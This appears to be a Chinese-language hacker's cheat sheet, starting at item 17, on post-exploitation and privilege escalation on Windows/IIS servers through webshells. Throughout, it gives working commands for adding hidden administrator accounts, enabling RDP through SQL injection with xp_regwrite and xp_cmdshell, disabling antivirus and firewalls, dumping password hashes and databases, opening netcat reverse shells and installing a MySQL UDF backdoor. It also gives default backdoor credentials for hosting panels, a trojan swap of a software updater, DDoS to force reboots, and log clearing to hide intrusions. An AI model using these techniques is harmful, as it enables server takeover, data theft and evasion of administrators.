17.進入伺服器,可以繼續內網滲透 這個時候可以嘗試開啟路由器 預設帳號密碼 admin admin
18.有的cmd執行很變態,asp馬裡,cmd路徑填上面,下面填:”"c:\xxx\exp.exe “whoami” 記得前面加兩個雙引號,不行後面也兩個,不行就把exp的路徑放在cmd那裡,下面不變。
19.一般增加不上使用者,或是想新增增加使用者的vbs,bat,遠控小馬到伺服器的啟動項裡,用“直接使伺服器藍屏重啟的東東”這個工具可以實現,
20.執行PwDump7.exe抓雜湊值的時候,建議重定向結果到儲存為1.txt /c c:\windows\temp\cookies\PwDump7.exe >1.txt
21.菜刀執行的技巧,上傳cmd到可執行目錄,右擊cmd 虛擬終端,help 然後setp c:\windows\temp\cmd.exe 設定終端路徑為:c:\windows\temp\cmd.exe
22.當不支援aspx,或是支援但跨不了目錄的時候,可以上傳一個讀iis的vps,執行命令列出所有網站目錄,找到主站的目錄就可以跨過去了。 上傳cscript.exe到可執行目錄,接著上傳iispwd.vbs到網站根目錄,cmd命令/c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs
23.如何辨別伺服器是不是內網? 192.168.x.x 172.16.x.x 10.x.x.x
(( dos命令大全 ))
檢視版本:ver
檢視許可權:whoami
檢視配置:systeminfo
檢視使用者:net user
檢視程序:tasklist
檢視正在執行的服務:tasklist /svc
檢視開放的所有埠:netstat -ano
查詢管理使用者名稱:query user
檢視搭建環境:ftp 127.0.0.1
檢視指定服務的路徑:sc qc Mysql
新增一個使用者:net user jianmei daxia.asd /add
提升到管理許可權:net localgroup administrators jianmei /add
新增使用者並提升許可權:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
檢視制定使用者資訊:net user jianmei
檢視所有管理許可權的使用者:net localgroup administrators
加入遠端桌面使用者組:net localgroup “Remote Desktop Users” jianmei /add
突破最大連線數:mstsc /admin /v:127.0.0.1
刪除使用者:net user jianmei /del
刪除管理員賬戶:net user administrator daxia.asd
更改系統登陸密碼:net password daxia.asd
啟用GUEST使用者:net user guest /active:yes
開啟TELNET服務:net start telnet
關閉麥咖啡:net stop “McAfee McShield”
關閉防火牆:net stop sharedaccess
檢視當前目錄的所有檔案:dir c:\windows\
檢視制定檔案的內容:type c:\windows\1.asp
把cmd.exe複製到c:\windows的temp目錄下並命名為cmd.txt:copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt
開3389埠的命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
檢視補丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt
(( SQL語句直接開啟3389 ))
3389登陸關鍵登錄檔位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中鍵值DenyTSConnections 直接控制著3389的開啟和關閉,當該鍵值為0表示3389開啟,1則表示關閉。
而MSSQL的xp_regwrite的儲存過程可以對註冊進行修改,我們使用這點就可以簡單的修改DenyTSConnections鍵值,從而控制3389的關閉和開啟。
開啟3389的SQL語句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
關閉3389的SQL語句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,1;–
2003可以實現一句話開3389: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f
(( 常見殺軟 ))
360tray.exe 360實時保護
ZhuDongFangYu.exe 360主動防禦
KSafeTray.exe 金山衛士 McAfee McShield.exe 麥咖啡
SafeDogUpdateCenter.exe 伺服器安全狗
(( windows提權中敏感目錄和敏感登錄檔的利用 ))
敏感目錄 目錄許可權 提權用途
C:\Program Files\ 預設使用者組users對該目錄擁有檢視權 可以檢視伺服器安裝的應用軟體 C:\Documents and Settings\All Users\「開始」選單\程式 Everyone擁有檢視許可權 存放快捷方式,可以下載檔案,屬性檢視安裝路徑 C:\Documents and Settings\All Users\Documents Everyone完全控制權限 上傳執行cmd及exp C:\windows\system32\inetsrv\ Everyone完全控制權限 上傳執行cmd及exp C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini 預設使用者組users擁有檢視許可權 安裝mysql時會將root密碼寫入該檔案 C:\windows\system32\ 預設使用者組users擁有檢視許可權 Shift後門一般是在該資料夾,可以下載後門破解密碼 C:\Documents and Settings\All Users\「開始」選單\程式\啟動 Everyone擁有檢視許可權 可以嘗試向該目錄寫入vbs或bat,伺服器重啟後執行。 C:\RECYCLER\D:\RECYCLER\ Everyone完全控制權限 回收站目錄。常用於執行cmd及exp C:\Program Files\Microsoft SQL Server\ 預設使用者組users對該目錄擁有檢視許可權 收集mssql相關資訊,有時候該目錄也存在可執行許可權 C:\Program Files\MySQL\ 預設使用者組users對該目錄擁有檢視許可權 找到MYSQL目錄中user.MYD裡的root密碼 C:\oraclexe\ 預設使用者組users對該目錄擁有檢視許可權 可以嘗試利用Oracle的預設賬戶提權 C:\WINDOWS\system32\config 預設使用者組users對該目錄擁有檢視許可權 嘗試下載sam檔案進行破解提權 C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini 預設使用者組users對該目錄擁有檢視許可權 Remote.ini檔案中存放著G6FTP的密碼 c:\Program Files\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\ 預設使用者組users對該目錄擁有檢視許可權 ServUDaemon.ini 中儲存了虛擬主機網站路徑和密碼 c:\windows\system32\inetsrv\MetaBase.xml 預設使用者組users對該目錄擁有檢視許可權 IIS配置檔案 C:tomcat5.0\conf\resin.conf 預設使用者組users對該目錄擁有檢視許可權 Tomat存放密碼的位置 C:\ZKEYS\Setup.ini 預設使用者組users對該目錄擁有檢視許可權 ZKEYS虛擬主機存放密碼的位置
(( 提權中的敏感登錄檔位置 ))
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp Mssql埠 HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server DenyTSConnections 遠端終端 值為0 即為開啟 HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mssql的登錄檔位置 HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 華眾主機登錄檔配置位置 HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ serv-u的使用者及密碼(su加密)位置 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\ WinStations\RDP-Tcp 在該登錄檔位置PortNumber的值即位3389埠值 HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers mysql管理工具Navicat的登錄檔位置,提權運用請谷歌 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters Radmin的配置檔案,提權中常將其匯出進行進行覆蓋提權 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ IIS登錄檔全版本洩漏使用者路徑和FTP使用者名稱漏洞 HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass 華眾主機在登錄檔中儲存的mssql、mysql等密碼 HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 星外主機mssql的sa賬號密碼,雙MD5加密 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ControlSet002 星外ftp的登錄檔位置,當然也包括ControlSet001、ControlSet003
(( wscript.shell的刪除和恢復 ))
載wscript.shell物件,在cmd下或直接執行:regsvr32 /u %windir%\system32\WSHom.Ocx 解除安裝FSO物件,在cmd下或直接執行:regsvr32.exe /u %windir%\system32\scrrun.dll 解除安裝stream物件,在cmd下或直接執行:regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll” 如果想恢復的話只需要去掉/U 即可重新再註冊以上相關ASP元件,這樣子就可以用了
(( 如何找到準確的終端連線埠?))
在aspx大馬裡,點選“系統資訊”第三個就是目前的3389埠
或是執行命令檢視正在執行的服務:tasklist /svc
找到:svchost.exe 1688 TermService
記住1688這個ID值,
檢視開放的所有埠:netstat -ano
找到1688這個ID值所對應的埠就是3389目前的埠
(( iis6提權提示Can not find wmiprvse.exe的突破方法 ))
突破方法一:
在IIS環境下,如果許可權做得不嚴格,我們在aspx大馬裡面是有許可權直接結束wmiprvse.exe程序的,程序檢視裡面直接K掉
在結束之後,它會再次執行,這時候的PID值的不一樣的。這時候我們回來去執行exp,直接秒殺。
突破方法二:
虛擬主機,一般許可權嚴格限制的,是沒許可權結束的,這時候我們可以考慮配合其他溢位工具讓伺服器強制重啟,比如“直接使伺服器藍屏重啟的東東”
甚至可以暴力點,DDOS秒殺之,管理髮現伺服器不通了首先肯定是以為伺服器宕機,等他重啟下伺服器(哪怕是IIS重啟下)同樣秒殺之。
(( 本地溢位提權 ))
計算機有個地方叫快取區,程式的快取區長度是被事先設定好的,如果使用者輸入的資料超過了這個快取區的長度,那麼這個程式就會溢位了.
快取區溢位漏洞主要是由於許多軟體沒有對快取區檢查而造成的.
利用一些現成的造成溢位漏洞的exploit通過執行,把使用者從users組或其它系統使用者中提升到administrators組.
想要執行cmd命令,就要wscript.shell組建支援,或是支援aspx指令碼也行,因為aspx指令碼能呼叫.net元件來執行cmd的命令.
(( sa提權 ))
掃描開放的埠,1433開了就可以找sa密碼提權,用大馬裡的搜尋檔案功能,sa密碼一般在conn.asp config.asp web.config 這三個檔案
也可以通過登錄檔找配置檔案,看下支援aspx不,支援的話跨目錄到別的站點上找,找到之後用aspshell自帶的sql提權登入再執行命令建立使用者即可。
aspx馬提權執行命令有點不一樣,點選資料庫管理–選MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–輸入帳號密碼連線即可
增加一個使用者:exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;– 提升為管理員:exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–
PS:如果增加不上,說明是xp_cmdshell組建沒有,增加xp_cmdshell組建:Use master dbcc addextendedproc(‘xp_cmdshell’,'xplog70.dll’)
【 1433一句話開3389 】
Exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
(( root提權 ))
利用mysql提權的前提就是,伺服器安裝了mysql,mysql的服務沒有降權,是預設安裝以系統許可權繼承的(system許可權). 並且獲得了root的賬號密碼
如何判斷一臺windows伺服器上的mysql有沒有降權? cmd命令net user 如果存在 mysql mssql這樣使用者或者類似的.通常就是它的mssql mysql服務已經被降權運行了
如何判斷伺服器上是否開啟了mysql服務? 開了3306埠,有的管理員會把預設埠改掉.另一個判斷方法就是網站是否支援php,一般支援的話都是用mysql資料庫的.
如何檢視root密碼? 在mysql的安裝目錄下找到user.myd這個檔案,root就藏在裡面,一般是40位cmd加密,一些php網站安裝的時候用的是root使用者,在conn.asp config.asp這些檔案裡。 有時會顯得很亂,這時就需要自己去組合,前17位在第一行可以找到,還有23位在第三行或是其他行,自己繼續找。
可以直接用php腳本里“mysql執行”,或是上傳個UDF.php,如果網站不支援PHP,可以去旁一個php的站,也可以把UDF.php上傳到別的phpshell上也可以。
填入帳號密碼之後,自然就是安裝DLL了,點選“自動安裝Mysql BackDoor” 顯示匯出跟建立函式成功後,緊接著執行增加使用者的命令即可。
注意:5.0版本以下(包括5.0的)預設c:\windows\系統目錄就可以了,5.1版本以上的不能匯出到系統目錄下建立自定義函式,只能匯出在mysql安裝目錄下的lib/plugin目錄中
例如:D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll
如果密碼看不見,或是組合不到40位,就本地安裝一個mysql吧, 1、停止mysql服務 2、替換下載下來的3個檔案(user.MYI user.MYD user.frm) 3、cmd切換到bin目錄下,進入mysql安全模式,cmd命令:mysqld-nt –skip-grant-tables 4、重新開啟一個cmd 切換到bin目錄下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot -proot 5、最後查詢一下就出來了select user,password from mysql.user;
(( serv-u提權 ))
這個檔案裡包含serv-u的md5密碼:C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini
找到這個檔案:ServUDaemon.ini 開啟找到:LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2
再拿md5密文去解密,再用現在的密碼登陸提權即可。
serv-u提權的前提是43958埠開了,且知道帳號密碼!
如果帳號密碼預設,直接用shell裡面的serv-u提權功能即可搞定,建議用aspx馬、php馬去提權,因為可以看回顯。
530說明密碼不是預設的,回顯330說明成功,900說明密碼是預設的……………..
在程式裡找個快捷方式,或是相關的檔案進行下載到本地,再檢視檔案的屬性,就可以找到serv-u的安裝目錄了。
目錄有修改許可權之serv-u提權:
找到serv-u的目錄,再找到使用者的配置檔案ServUDaemon.ini,直接增加一個使用者程式碼,儲存!
接著本地cmd命令:ftp 伺服器ip
回車,輸入帳號密碼再回車………………….
接著先試試普通的cmd命令提權,不行的話就使用ftp提權的命令:
Quote site exec net user jianmei daxia /add 增加一個使用者
Quote site exec net localgroup administrators jianmei /add 提升到管理員許可權
200 EXEC command successful (TID=33). 執行成功的回顯資訊
Maintenance=System 許可權型別多加一行指定新加帳號為系統管理員
ReloadSettings=True 在修改ini檔案後需加入此項,這時serv-u會自動重新整理配置檔案並生效
(( 埠轉發 ))
什麼情況下適合轉發埠?
1.伺服器是內網,我們無法連線。 2.伺服器上有防火牆,阻斷我們的連線。
轉發埠的前提,我們是外網或是有外網伺服器。
找個可讀可寫目錄上傳lcx.exe
本地cmd命令:lcx.exe -listen 1988 4567 (監聽本地1988埠並轉發到4567埠)
接著shell命令:/c c:\windows\temp\cookies\lcx.exe -slave 本機ip 1988 伺服器ip 3389 (把伺服器3389埠轉發到本地4567埠)
之後本地連線:127.0.0.1:4567 (如果不想加上:4567的話,本地執行命令的時候,把4567換成3389來執行就行了)
以上是本機外網情況下操作,接著說下在外網伺服器裡如何操作:
上傳lxc.exe cmd.exe到伺服器且同一目錄,執行cmd.exe命令:lcx.exe -listen 1988 4567
接著在aspxshell裡點選埠對映,遠端ip改為站點的ip,遠埠程填1988,點選對映埠,接著在伺服器裡連線127.0.0.1:4567就可以了。
(( nc反彈提權 ))
當可以執行net user,但是不能建立使用者時,就可以用NC反彈提權試下,特別是內網伺服器,最好用NC反彈提權。
不過這種方法, 只要對方裝了防火牆, 或是遮蔽掉了除常用的那幾個埠外的所有埠,那麼這種方法也失效了….
找個可讀可寫目錄上傳nc.exe cmd.exe
-l 監聽本地入棧資訊
-p port開啟本地埠
-t 以telnet形式應答入棧請求
-e 程式重定向
本地cmd執行:nc -vv -l -p 52 進行反彈
接著在shell裡執行命令:c:\windows\temp\nc.exe -vv 伺服器ip 999 -e c:\windows\temp\cmd.exe 最好是80或8080這樣的埠,被防火牆攔截的機率小很多
執行成功後本地cmd命令:cd/ (只是習慣而已)
接著以telnet命令連線伺服器:telnet 伺服器ip 999
回車出現已選定伺服器的ip就說明成功了,接著許可權比較大了,嘗試建立使用者!
壞蛋: 本地cmd執行:nc -vv -l -p 52 進行反彈 c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe 伺服器ip 52
低調小飛: shell執行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe
一般這樣的格式執行成功率很小,不如直接在cmd那裡輸入:c:\windows\temp\nc.exe 命令這裡輸入:-vv 伺服器ip 999 -e c:\windows\temp\cmd.exe
這個技巧成功率比上面那個大多了,不單單是nc可以這樣,pr這些提權exp也是可以的。
(( 星外提權 ))
如何知道是不是星外主機?
第一:網站物理路徑存在“freehost” 第二:asp馬裡點選程式,存在“7i24虛擬主機管理平臺”“星外主機”之類的資料夾
預設帳號:freehostrunat 預設密碼:fa41328538d7be36e83ae91a78a1b16f!7
freehostrunat這個使用者是安裝星外時自動建立的,已屬於administrators管理組,而且密碼不需要解密,直接登入伺服器即可
星外常寫目錄:
C:\RECYCLER\ C:\windows\temp\ e:\recycler\ f:\recycler\ C:\php\PEAR\ C:\WINDOWS\7i24.com\FreeHost C:\php\dev C:\System Volume Information C:\7i24.com\serverdoctor\log\ C:\WINDOWS\Temp\ c:\windows\hchiblis.ibl C:\7i24.com\iissafe\log\ C:\7i24.com\LinkGate\log C:\Program Files\Thunder Network\Thunder7\ C:\Program Files\Thunder Network\Thunder\ C:\Program Files\Symantec AntiVirus\SAVRT\ c:\windows\DriverPacks\C\AM2 C:\Program Files\FlashFXP\ c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\ C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\ c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv c:\Program Files\360\360Safe\deepscan\Section\mutex.db c:\Program Files\Helicon\ISAPI_Rewrite3\error.log c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Validate.dat C:\Program Files\Zend\ZendOptimizer-3.3.0\docs C:\Documents and Settings\All Users\DRM\ C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection C:\Documents and Settings\All Users\Application Data\360safe\softmgr\ C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\
ee提權法:
找個可讀可寫目錄上傳ee.exe
cmd命令:/c c:\windows\temp\cookies\ee.exe -i (獲取星外帳號的id值,例如回顯:FreeHost ID:724)
接著命令:/c c:\windows\temp\cookies\ee.exe -u 724 (獲取星外的帳號密碼)
vbs提權法:
找個可讀可寫目錄上傳cscript.exe iispwd.vbs
cmd命令:/c “c:\windows\temp\cookies\cscript.exe” c:\windows\temp\cookies\iispwd.vbs
意思是讀取iis,這樣一來,不但可以獲取星外的帳號密碼,還可以看到同伺服器上的所有站點的目錄。
可行思路大全:
經測試以下目錄中的檔案許可權均為everyone,可以修改,可以上傳同文件名替換,刪除,最重要的是還可以執行:
360防毒db檔案替換: c:\Program Files\360\360SD\deepscan\Section\mutex.db c:\Program Files\360\360Safe\deepscan\Section\mutex.db C:\Program Files\360\360Safe\AntiSection\mutex.db
IISrewrite3 檔案替換: C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
諾頓防毒檔案替換: c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Persist.Dat
一流過濾相關目錄及檔案: C:\7i24.com\iissafe\log\startandiischeck.txt C:\7i24.com\iissafe\log\scanlog.htm
其他: Zend檔案替換:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll 華盾檔案替換:C:\WINDOWS\hchiblis.ibl Flash檔案替換:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx DU Meter流量統計資訊日誌檔案替換:c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
(( 360提權 ))
找個可讀可寫目錄上傳360.exe
cmd命令:/c c:\windows\temp\cookies\360.exe
會提示3段英文: 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 這是成功的徵兆,接著連線伺服器連按5下shift鍵,將彈出工作管理員,點選新建任務:explorer.exe 會出現桌面,接下來大家都會弄了……
(( 搜狗提權 ))
搜狗的目錄預設是可讀可寫的,搜狗每隔一段時間就會自動升級,而升級的檔案是pinyinup.exe
我們只要把這個檔案替換為自己的遠控木馬,或是新增賬戶的批處理,等搜狗升級的時候,就可以達成我們的目的了。
(( 華眾虛擬主機提權 ))
就經驗來說,一般溢位提權對虛擬主機是無果的,而且華眾又沒有星外那麼明顯的漏洞。
所以華眾提權關鍵之處就是蒐集資訊,主要登錄檔位置:
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密碼 HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密碼
c:\windows\temp 下有hzhost主機留下的ftp登陸記錄有使用者名稱和密碼
以上資訊配合hzhosts華眾虛擬主機系統6.x 破解資料庫密碼工具使用
百度搜索:hzhosts華眾虛擬主機系統6.x 破解資料庫密碼工具
(( N點虛擬主機 ))
N點虛擬主機管理系統預設資料庫地址為:\host_date\#host # date#.mdb
rl直接輸入不行 這裡咱們替換下 #=%23 空格=%20
修改後的下載地址為/host_date/%23host%20%23%20date%23196.mdb
N點資料庫下載之後找到sitehost表 FTPuser&FTPpass 值 FTPpass是N點加密資料然後用N點解密工具解密得到FTP密碼
N點預設安裝路徑C:\Program Files\NpointSoft\npointhost\web\ D:\Program Files\NpointSoft\npointhost\web\ 預設許可權可讀。遇到對方所用虛擬主機是N點時候 可以考慮 讀取該資料夾下載資料庫
N點解密工具程式碼 <% set iishost=server.CreateObject(“npoint.host”)
x=iishost.Eduserpassword(“FTPpass值”,0)
response.write x %>
本地搭建N點環境在N點目錄開啟訪問即可。得到密碼減去後10位字元即為 N點的虛擬主機管理密碼。 然後需要在管理系統登陸確認下 在hostcs 表 找到 Hostip 或者hostdomain 一般預設是 Hostip=127.0.0.1 hostdomain=www.npointhost.com 這裡可以不管 因為 這裡不修改的話就是伺服器預設ip地址sitehost 表的host_domain就是繫結的域名 直接查下IP地址即可 咱們批量的話 掃描的地址即可。 管理系統地址即為IP地址 選擇虛擬主機 登入即可 接下來傳shell大家應該都會了。 接下來說提權 hostcs表存有sa root賬戶的密碼 解密方法一樣。預設都是 解密結果123456 還有就是在adminlogo 存在N點系統管理密碼 30位的cfs加密可以在http://www.md5.com.cn/cfs 碰撞下試試 或者用asm的工具破解下我的運氣不好沒成功過 3057C0DB854C878E72756088058775 這個是預設admin的密碼
(( 脫庫 ))
asp 程式的網站一般不是access就是msssql,access資料庫脫褲很簡單,直接下載資料庫即可,mssql資料庫可以用shell自帶的脫褲功 能,找到資料庫的連線資訊,一般在web.config.asp裡,然後連線一下SA,找到會員表(UserInfo)就可以了。
PHP程式就是mysql了,找到root帳號密碼,用PHP大馬自己帶連結功能連線一下,也自己自己上傳PHP脫褲指令碼,之後找到目標資料庫(資料庫名),再找到會員表menber進行脫褲即可。
(( 伺服器 ))
命令提示符已被系統管理員停用? 解決方法:執行→gpedit.msc→使用者配置→管理模板→系統,在右側找到”阻止命令提示符”, 然後雙擊一下,在”設定”裡面選中”未配置” ,最後點選”確定”。
如何判斷伺服器的型別? 解決方法:直接ping伺服器ip,看回顯資訊進行判斷
TTL=32 9X/ME
TTL=64 linux
TTL=128 2000X/XP
TTL=255 UNIX
為什麼有時3389開放卻不能連線? 原因分析:有時候是因為防火牆,把3389轉發到其他埠就可以連線了,有的轉發後依然是連線不上,那是因為管理員在TCP/IP裡設定的埠限制 解決方法:我們需要把埠轉為TCP/IP裡設定的只允許連線的埠其中一個就可以了,更好的辦法是取消埠限制。
最簡單的往伺服器上傳東西方法是什麼? 本機開啟“HFS網路檔案伺服器”這款工具,把需要上傳的工具直接拖進左邊第一個框內,複製上面的地址,到伺服器裡的瀏覽器訪問,就可以下載了
限 制“命令提示符”的執行許可權? 我的電腦(右鍵)–資源管理器中–點選“工具”按鈕,選擇“資料夾選項”,切換到“檢視”標籤,去掉“使用簡單檔案共享(推薦)”前面的鉤,這一步是為了 讓檔案的屬性選單中顯示“安全”標籤,然後進入“c:\windows\system32\”,找到“cmd.exe”,點右鍵選擇“屬性”,切換到“安 全”標籤,將其中“組或使用者名稱稱”中除了管理員外的所有使用者都刪除,完成後點“確定”這樣當普通使用者想執行“命令提示符”的時候將會出現“拒絕訪問”的警 告框。
如何更改windows2003最大連線數? windows2003中的遠端桌面功能非常方便,但是初始設定只允許2個使用者同時登陸,有些時候因為我在公司連線登陸後斷開,同事在家裡用其他使用者登陸 後斷開,當我再進行連線的時候,總是報錯“終端服務超過最大連線數”這時候我和同事都不能登陸,通過以下方法來增加連線數,運 行:services.msc,啟用license logging,別忘了新增完畢後再關閉 License Logging 開啟win2k3的控制面板中的“授權”,點“新增許可”輸入要改的連線數
如何清除伺服器裡的IP記錄日誌? 1.我的電腦右鍵管理–事件檢視器–安全性–右鍵清除所有事件 2.開啟我的電腦–C盤–WINDOWS–system32–config–AppEvent.Evt屬性–安全–全部都拒絕 3.Klaklog.evt屬性–安全–全部都拒絕–SecEvent.Tvt屬性–安全–全部都拒絕